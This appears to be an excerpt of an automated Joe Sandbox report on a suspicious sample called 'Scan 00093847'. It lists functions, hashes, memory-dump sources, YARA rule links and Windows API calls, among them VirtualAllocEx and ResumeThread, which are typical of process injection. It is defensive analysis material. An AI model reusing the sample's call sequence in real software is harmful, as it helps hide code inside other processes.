                                            • Opcode ID: 80dd5676ee08ea89628d6f8f62f5e5c6e223868e6b111a0483ce4b787a33e9e8
                                            • Instruction ID: 463f9bd653843dbf7c262cce8c243ff70df85c63c282f97cd4c54da32dd172fb
                                            • Opcode Fuzzy Hash: 80dd5676ee08ea89628d6f8f62f5e5c6e223868e6b111a0483ce4b787a33e9e8
                                            • Instruction Fuzzy Hash: 6111D3B69003499FDB14DF9AC448A9EFBF8EB88314F10842ED959A7240C375A945CFA5
                                            Function 013FB2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013FB101,00000800,00000000,00000000), ref: 013FB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: c9b05163f5aa5811aee73e7bc0428c173986916ac9c228057421c5178158854d
                                            • Instruction ID: 910bd11b35756b8f5a81b9251bb5d5825a29fbf239860b44be53f352772fc052
                                            • Opcode Fuzzy Hash: c9b05163f5aa5811aee73e7bc0428c173986916ac9c228057421c5178158854d
                                            • Instruction Fuzzy Hash: 201100B6D003489FDB10CF9AD844A9EFFF8EB88310F10842EE959A7200C775A545CFA4
                                            Function 07A7B858 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 031d1c5e5ae2d9c39974cc7126cd54b3f18ebd9ae13f6d594c64dfaa7c8e4827
                                            • Instruction ID: 65361f388190daeeebc8c2055c12c5528882c07f3e5696b9a3b6f687e9198570
                                            • Opcode Fuzzy Hash: 031d1c5e5ae2d9c39974cc7126cd54b3f18ebd9ae13f6d594c64dfaa7c8e4827
                                            • Instruction Fuzzy Hash: 321146B19003499FDB10DFAAC8457DEFFF5EF88324F24881AD459A7240CB38A945CBA5
                                            Function 07A7B9E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A7BA56
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: cfa50789a2b66fcdfc7333b22af13fde99b6930823ed993e6e59ba41b9c5b8e4
                                            • Instruction ID: 08039142926c6c98322d818407da9c3944c5c1591c7399ad50d29c8fe75e25ec
                                            • Opcode Fuzzy Hash: cfa50789a2b66fcdfc7333b22af13fde99b6930823ed993e6e59ba41b9c5b8e4
                                            • Instruction Fuzzy Hash: 181137B19003499FCB10DFAAC845ADFBFF5EF88320F108419E529A7250C775A954CFA4
                                            Function 013FB019 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: f5abf0784f0df29af2d7094b135fffdb1d59cb03418e7f8c01504d18692dda44
                                            • Instruction ID: 844a2cd89c164aaf95ff785c9a65bb6b0689724af1fca4a1523e80fca79e26ac
                                            • Opcode Fuzzy Hash: f5abf0784f0df29af2d7094b135fffdb1d59cb03418e7f8c01504d18692dda44
                                            • Instruction Fuzzy Hash: B21132B5C003498FDB20CF9AC844ADEFFF4AB88314F10841ED928A7210C375A549CFA0
                                            Function 07A7B860 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 58d93f9a5b4de37e42e4b6d55e95ac306a0c758ae819c62db0dba0f1fd641976
                                            • Instruction ID: f64a3191ecab6a4b6cb9ac2f3eef51a4b59796864cc8b1f60c99d63d5efd32a9
                                            • Opcode Fuzzy Hash: 58d93f9a5b4de37e42e4b6d55e95ac306a0c758ae819c62db0dba0f1fd641976
                                            • Instruction Fuzzy Hash: D81128B1D003498BDB10DFAAC8457DEFBF5EB88324F24841AD519A7240CB75A944CBA4
                                            Function 013FB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 6f3d033fd94fcbe7298864c26ca0cdb4275f4d95229c433cb2587a0b061ed1d5
                                            • Instruction ID: b785ba08ef20c2c06d9b9b0aa58185710bd4025cf3a590ee68bff741673e06a8
                                            • Opcode Fuzzy Hash: 6f3d033fd94fcbe7298864c26ca0cdb4275f4d95229c433cb2587a0b061ed1d5
                                            • Instruction Fuzzy Hash: 7911DFB5C003498FDB24DF9AC444ADEFBF5AB88224F10841ED969A7610C379A549CFA5
                                            Function 07A7D66C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A7F4E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 571a05a9e2bd53aaed6be25204ac426c55e75468597efdbe2b01bfc23ae29e38
                                            • Instruction ID: bde0a142ee7d0f8da05c5388c8665ab0ef16a6c4f840b592b2d36952f4b6f694
                                            • Opcode Fuzzy Hash: 571a05a9e2bd53aaed6be25204ac426c55e75468597efdbe2b01bfc23ae29e38
                                            • Instruction Fuzzy Hash: 361106B58003499FDB10DF99C849BDEBBF8FB48320F108419E969A7200C375A954CFA5
                                            Function 07A7F483 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A7F4E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: edafb70be0810eaa0d6becfd6032b7f3a26b49f6e8c2f577f8083ed539417c0b
                                            • Instruction ID: 9d6c8ad31e492681a36bccd5500bb2e0f41c5da8d5e0f0764774d89d7929d47c
                                            • Opcode Fuzzy Hash: edafb70be0810eaa0d6becfd6032b7f3a26b49f6e8c2f577f8083ed539417c0b
                                            • Instruction Fuzzy Hash: 3B1106B58003499FDB10DF9AC849BDEBFF8EB48320F108419E968A7200C375A554CFA5
                                            Function 0134D3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835581274.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_134d000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f557faa0d98647f34b42a974eb7c3288585ece383b887114bfa393be4cbf480
                                            • Instruction ID: bc488cae4368e25af6d92babfb2f243f08a5e050ddbefc08ea3329f73f360adf
                                            • Opcode Fuzzy Hash: 7f557faa0d98647f34b42a974eb7c3288585ece383b887114bfa393be4cbf480
                                            • Instruction Fuzzy Hash: 382124B1604204DFDB01DF58D9C0B56BFA5FBA4328F20C568E90A1B356C73AF416CAA1
                                            Function 0135D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835606071.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_135d000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d045ab78b3c014fe06bf97bc676b01f9a45cd17fe2f6165578f6e43148419f44
                                            • Instruction ID: 3a4b24691832739365d8658dd156f8abed523e36242175399afb3d912aeb1935
                                            • Opcode Fuzzy Hash: d045ab78b3c014fe06bf97bc676b01f9a45cd17fe2f6165578f6e43148419f44
                                            • Instruction Fuzzy Hash: 7F21D371604204AFDB45DF98D9C4F25BBA5FB84728F24C66DDD0A4B352C336D446CA61
                                            Function 0135D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835606071.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_135d000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adde6e30e48725647d830e8b4e14ee2366dad1b61e087bb537e46609816182b1
                                            • Instruction ID: ae89a5ff14c372017cb453a0c2e5dbf2ade59b45175955e12b28f90875f412db
                                            • Opcode Fuzzy Hash: adde6e30e48725647d830e8b4e14ee2366dad1b61e087bb537e46609816182b1
                                            • Instruction Fuzzy Hash: 2A21FF71604204DFDB55DF58D884F26BBA5EB84728F20C969DC0A4B386C33AD807CA61
                                            Function 0135D006 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835606071.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_135d000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c56097737d40a39f962149b2c6b9f8862909cffae4f16ae44f87448ffdc97c7
                                            • Instruction ID: 837993890c01aea99f6de74f8cdcf7a5455586b190bb9aae8de1b7b865eddced
                                            • Opcode Fuzzy Hash: 5c56097737d40a39f962149b2c6b9f8862909cffae4f16ae44f87448ffdc97c7
                                            • Instruction Fuzzy Hash: BA21A1755093808FDB03CF24D994B15BF71EB45218F28C5EAD8498B2A7C33AD80ACB62
                                            Function 0134D3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835581274.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_134d000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                            • Instruction ID: 9b34a39f699d2251cd9d73a4ea807712329e240fc42ece0fcf567eb55e9d2bf9
                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                            • Instruction Fuzzy Hash: E711DF76504240CFDB02CF54D5C4B56BFB2FB94324F24C2A9D9090B356C33AE45ACBA1
                                            Function 0135D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835606071.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_135d000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                            • Instruction ID: fe7cec82cfbb8fde3364de5dac7dd0632f260e3cd1029b704968ee99c768f053
                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                            • Instruction Fuzzy Hash: E411BB75904280DFDB02CF54C5C4B15BBB2FB84628F24C6ADDC494B296C33AD44ACB61
                                            Function 07F50910 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846785555.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7f50000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20c765f477a1b31bf80ff6a7d60fddc43553117a2bf79cc88e590bcd62f75849
                                            • Instruction ID: 8cb18ac44a9c1c6c86112b049a28234e1dd2b2f32fc891f418e2e967056177e8
                                            • Opcode Fuzzy Hash: 20c765f477a1b31bf80ff6a7d60fddc43553117a2bf79cc88e590bcd62f75849
                                            • Instruction Fuzzy Hash: AA0184B2619512DBF714193AE8253B576A9EB86311F0C4433FA5AC7394CE2DD850C652
                                            Function 07F50900 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846785555.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7f50000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6d50648e775a20785eb799eac69e4acaccf6c6c66d6b951ef50ebbf5d46a321
                                            • Instruction ID: a3b0e72da6ae31e3c7e35dcc337ea8c1f2766c38c6c54d8de07013334577cded
                                            • Opcode Fuzzy Hash: a6d50648e775a20785eb799eac69e4acaccf6c6c66d6b951ef50ebbf5d46a321
                                            • Instruction Fuzzy Hash: 4C01AFB620D2129BF7150939EC157B577AAEB87312F0D4063EA49C7395DE2CC854DB21

                                            Non-executed Functions

                                            Function 07A790F0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: }^`
                                            • API String ID: 0-519891959
                                            • Opcode ID: 263a018856bd53f3a24925714e62109ef072a133f53d107613e8e2df867c7a6b
                                            • Instruction ID: 4f684b7333fd9538eed26528325e54f679cafe653a21d01fcbe7e21f771b9190
                                            • Opcode Fuzzy Hash: 263a018856bd53f3a24925714e62109ef072a133f53d107613e8e2df867c7a6b
                                            • Instruction Fuzzy Hash: 1AE1D9B4E002198FCB14DFA9C9809AEFBB2FF89304F24816AE415AB355D735AD41CF61
                                            Function 05410040 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2851cb2c41143237838e50edfa2b2739dbdb8dc8f0d0fb68d4cc60e298cca03a
                                            • Instruction ID: a18bfbacfc8addf7f101b1e8da2b126b77ba4724590b6e2aef3a8a2bb4467ec8
                                            • Opcode Fuzzy Hash: 2851cb2c41143237838e50edfa2b2739dbdb8dc8f0d0fb68d4cc60e298cca03a
                                            • Instruction Fuzzy Hash: C21283F04227468AE710CF65E95E1897FB9BB41318FD0C22DE2A56E2E1DFB8154ACF44
                                            Function 07A7A7C8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e4902c04aba17e22a9ec1d438c9a937314062eff996f903ef126334c5b635b0
                                            • Instruction ID: b72e6626ecf48101d2b5cedd97d1abaa5b21ce6bfa75bd7ae2af327a137eec35
                                            • Opcode Fuzzy Hash: 8e4902c04aba17e22a9ec1d438c9a937314062eff996f903ef126334c5b635b0
                                            • Instruction Fuzzy Hash: 63E1E6B4E002199FCB14CFA9C9909AEBBB2FF89304F24C169E415AB355D735AD41CFA0
                                            Function 07A79528 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10372281f660929acaff52310c0ae8d52b65f5b37b56d3af59b2d799910484cf
                                            • Instruction ID: f3ce6d2423ddeba5b826f606a2c95945ee30b4e29e83edd5474d1716d80d12a3
                                            • Opcode Fuzzy Hash: 10372281f660929acaff52310c0ae8d52b65f5b37b56d3af59b2d799910484cf
                                            • Instruction Fuzzy Hash: 59E10BB4E002198FDB14CFA9C5809AEFBB6FF89304F24816AE415AB355D735AD41CFA1
                                            Function 07A7B038 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc0cd51cb33fb9ef6b8531c62db6099f9bddcd1a032bf50b71e8bb497ca4044d
                                            • Instruction ID: 3a8cfe41603569cc557443126d0bfce4a2d613c1619ed7051f126ae28a0ad098
                                            • Opcode Fuzzy Hash: bc0cd51cb33fb9ef6b8531c62db6099f9bddcd1a032bf50b71e8bb497ca4044d
                                            • Instruction Fuzzy Hash: B8E1E9B4E012198FCB14CFA9C9909AEFBB2FF89304F248169E415AB355D735AD41CFA1
                                            Function 07A7AC00 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 705505378dfbbbaec3a76192471148d8641b6b6454719d85aeae6faae001179c
                                            • Instruction ID: 981205dc034000b82e6e749c95b10d9a89284172b04a67a86774277769706324
                                            • Opcode Fuzzy Hash: 705505378dfbbbaec3a76192471148d8641b6b6454719d85aeae6faae001179c
                                            • Instruction Fuzzy Hash: AEE1F6B4E002199FCB14CFA9C9809AEBBB2FF89305F24C169E415AB356D735AD41CF61
                                            Function 07A7049A Relevance: .3, Instructions: 267COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f734d83b98d502ba66c2ef237b5dc545bdbe6c99941f3fb1cd21eeb503638c3b
                                            • Instruction ID: 244ef91940e72e2dcc904739dc18cdc930c78dc94e7b08583ef098bfaf30bdd6
                                            • Opcode Fuzzy Hash: f734d83b98d502ba66c2ef237b5dc545bdbe6c99941f3fb1cd21eeb503638c3b
                                            • Instruction Fuzzy Hash: F8D1F931D2075A9ACB10EF64D990A9DF7B1FFA5300F209BAAE00937251EB746AC5CB51
                                            Function 013FDC74 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed1d913890fbc5bfad5502d5f63151b5dcd4be61190a941d3092c3e8f66ffe5
                                            • Instruction ID: 3c5af0bb6ccfa607269f3627d69176121be28495f148ed390abe09cf917e69b7
                                            • Opcode Fuzzy Hash: 1ed1d913890fbc5bfad5502d5f63151b5dcd4be61190a941d3092c3e8f66ffe5
                                            • Instruction Fuzzy Hash: 46A17F36E002168FCF05DFB9C88459EBBB6FF84304B15856EEA05AB265DB71D905CB80
                                            Function 07A704A8 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 196153d7abe98781bedacafbcb13c835a1afecb6299103daeb393821e11ef564
                                            • Instruction ID: 0079f54739fa51329a360f1cb5449a1f0a97f94edbb3d7350f7a4538d88e85f3
                                            • Opcode Fuzzy Hash: 196153d7abe98781bedacafbcb13c835a1afecb6299103daeb393821e11ef564
                                            • Instruction Fuzzy Hash: F2D10931D2075A9ACB10EF64D990A9DF7B1FFA5300F209BAAE00937251EB746AC5CF51
                                            Function 05410006 Relevance: .2, Instructions: 239COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 324c5b1e09112b80aa201df67e4b63acd99313d1a335a7c241566669c0dc86a5
                                            • Instruction ID: c1c03bbe9ceb68fc01339997cd2759e3461e3b2fd764b765c35b781cf86ef085
                                            • Opcode Fuzzy Hash: 324c5b1e09112b80aa201df67e4b63acd99313d1a335a7c241566669c0dc86a5
                                            • Instruction Fuzzy Hash: 6EC109B04227468BD710CF65E85A1897FB9BB85328F95C32DE1A16F2E1DFB8144ACF44
                                            Function 07A7A7B8 Relevance: .1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff348da0b3da3b9b9f4797e4fdd7c05f49cf6d3fc70c2eb1ab4b1137c9044b68
                                            • Instruction ID: a60684d48f8b19a452fd48e626a2595e2ea0cb2b4150b43631f3c621cc5b9c6d
                                            • Opcode Fuzzy Hash: ff348da0b3da3b9b9f4797e4fdd7c05f49cf6d3fc70c2eb1ab4b1137c9044b68
                                            • Instruction Fuzzy Hash: A8512AB0E052199FCB14CFA9C9905AEBBB2FF89304F24C169D418BB356D7319942CFA1
                                            Function 07A79519 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89dfebe111384e85a9f747dbaa0287283b999cdc1f679db31999ff8d8531d8b3
                                            • Instruction ID: 6b4c396bd71cbaa2861060b9f6d8af734d16996669f377f5859ab301e5b5b247
                                            • Opcode Fuzzy Hash: 89dfebe111384e85a9f747dbaa0287283b999cdc1f679db31999ff8d8531d8b3
                                            • Instruction Fuzzy Hash: 95511DB4E052598FCB14CFA9C9805AEFBB2FF89304F24C16AD418AB356D7356941CF61
                                            Function 07A7ABF0 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f210da1941bf109dbd2bc29aec0cafe72eef9e394e48fc4a183f61a4a344fb9
                                            • Instruction ID: 31362cd115683dbaf3f73f6606c3e617ec19e99b8f0d9fdfaf832fe541f09470
                                            • Opcode Fuzzy Hash: 5f210da1941bf109dbd2bc29aec0cafe72eef9e394e48fc4a183f61a4a344fb9
                                            • Instruction Fuzzy Hash: 4C5118B0E052199FCB14CFA9C9805AEBBB2FF89300F24C16AD418AB356D7359D41CF61

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:4.3%
                                            Signature Coverage:6.7%
                                            Total number of Nodes:163
                                            Total number of Limit Nodes:14
                                            execution_graph 76668 424963 76669 42497f 76668->76669 76670 4249a7 76669->76670 76671 4249bb 76669->76671 76672 42c593 NtClose 76670->76672 76678 42c593 76671->76678 76674 4249b0 76672->76674 76675 4249c4 76681 42e753 RtlAllocateHeap 76675->76681 76677 4249cf 76679 42c5ad 76678->76679 76680 42c5be NtClose 76679->76680 76680->76675 76681->76677 76682 42f923 76683 42f893 76682->76683 76684 42f8f0 76683->76684 76688 42e713 76683->76688 76686 42f8cd 76691 42e633 76686->76691 76694 42c8a3 76688->76694 76690 42e72e 76690->76686 76697 42c8f3 76691->76697 76693 42e64c 76693->76684 76695 42c8c0 76694->76695 76696 42c8d1 RtlAllocateHeap 76695->76696 76696->76690 76698 42c90d 76697->76698 76699 42c91e RtlFreeHeap 76698->76699 76699->76693 76700 4119e3 76701 4119f8 76700->76701 76706 413cb3 76701->76706 76704 42c593 NtClose 76705 411a11 76704->76705 76707 413cd9 76706->76707 76709 411a04 76707->76709 76710 413a33 76707->76710 76709->76704 76711 413a55 76710->76711 76713 42c813 76710->76713 76711->76709 76714 42c830 76713->76714 76717 10c2c70 LdrInitializeThunk 76714->76717 76715 42c858 76715->76711 76717->76715 76718 418d83 76720 418db3 76718->76720 76721 418ddf 76720->76721 76722 41b283 76720->76722 76723 41b2c7 76722->76723 76724 41b2e8 76723->76724 76725 42c593 NtClose 76723->76725 76724->76720 76725->76724 76726 413fa3 76727 413fa4 76726->76727 76732 417733 76727->76732 76729 413fdb 76730 41400f PostThreadMessageW 76729->76730 76731 414020 76729->76731 76730->76731 76733 417757 76732->76733 76734 417793 LdrLoadDll 76733->76734 76735 41775e 76733->76735 76734->76735 76735->76729 76736 401b28 76737 401b30 76736->76737 76737->76737 76740 42fcc3 76737->76740 76743 42e1e3 76740->76743 